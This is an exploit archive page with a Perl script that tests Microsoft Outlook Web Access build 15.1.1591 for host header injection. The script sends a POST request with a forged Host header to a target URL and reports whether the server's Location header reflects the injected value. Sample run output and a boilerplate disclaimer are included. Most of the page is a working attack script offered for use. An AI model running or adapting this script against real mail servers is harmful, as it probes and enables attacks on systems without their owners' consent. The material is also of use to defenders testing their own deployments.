what you don't know can hurt you

Microsoft Outlook Web Access Build 15.1.1591 Header Injection

Microsoft Outlook Web Access Build 15.1.1591 Header Injection
Posted Sep 2, 2019
Authored by Todor Donev

Microsoft Outlook Web Access build 15.1.1591 suffers from a remote host header injection vulnerability.

tags | exploit, remote, web
MD5 | 83e1a1d05799abc8fa7716f9dca9a040

Microsoft Outlook Web Access Build 15.1.1591 Header Injection

Change Mirror Download
#!/usr/bin/perl -w
#
# Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# [test@localhost microsoft_owa]$ perl microsoft_owa.pl https://133.71.33.37/
# [+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
# =======================================================================================
# [!] Author: Todor Donev <todor.donev@gmail.com>
# =======================================================================================
# [+] > Host: sultan-of-swing
# [+] > User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15
# [+] > Content-Type: application/x-www-form-urlencoded
# [+] < Cache-Control: no-cache
# [+] < Connection: close
# [+] < Date: Sat, 31 Aug 0000 13:37:00 GMT
# [+] < Pragma: no-cache
# [+] < Location: https://sultan-of-swing/owa/
# [+] < Server: Microsoft-IIS/10.0
# [+] < Content-Length: 0
# [+] < Client-Date: Sat, 31 Aug 0000 13:37:00 GMT
# [+] < Client-Peer: 133.71.33.37:443
# [+] < Client-Response-Num: 1
# [+] < Client-SSL-Cert-Issuer: CENSORED
# [+] < Client-SSL-Cert-Subject: CENSORED
# [+] < Client-SSL-Cipher: ECDHE-RSA-AES128-GCM-SHA256
# [+] < Client-SSL-Socket-Class: IO::Socket::SSL
# [+] < Client-SSL-Warning: Peer certificate not verified
# [+] < X-FEServer: MAILSVRTEST
# [+] < X-RequestId: CENSORED
# =======================================================================================
# [+] Microsoft OWA Location is Injected => https://sultan-of-swing/owa/
#
# Description:
# OWASP Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)
# https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
#
#

use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || 'https://192.168.1.1:443/';

printf ("[+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit\n");
printf ("=======================================================================================\n");
printf ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
printf ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);

my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,
[ Content_Type => "application/x-www-form-urlencoded" ,
Host => "sultan-of-swing"], " ");
printf ("=======================================================================================\n");
my $response = $browser->request($request);
if ($response->header('Location') =~ m/sultan-of-swing/i){

say "[+] > $_: ", $request->header($_) for $request->header_field_names;
say "[+] < $_: ", $response->header($_) for $response->header_field_names;
printf ("=======================================================================================\n")
printf ("[+] Microsoft OWA Location is Injected => %s\n", $response->header('Location'));
exit;

} else {

printf ("[-] Exploit failed!\n");
exit;

}

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    28 Files
  • 2
    Nov 2nd
    1 Files
  • 3
    Nov 3rd
    1 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    19 Files
  • 6
    Nov 6th
    65 Files
  • 7
    Nov 7th
    22 Files
  • 8
    Nov 8th
    18 Files
  • 9
    Nov 9th
    1 Files
  • 10
    Nov 10th
    1 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    65 Files
  • 13
    Nov 13th
    27 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close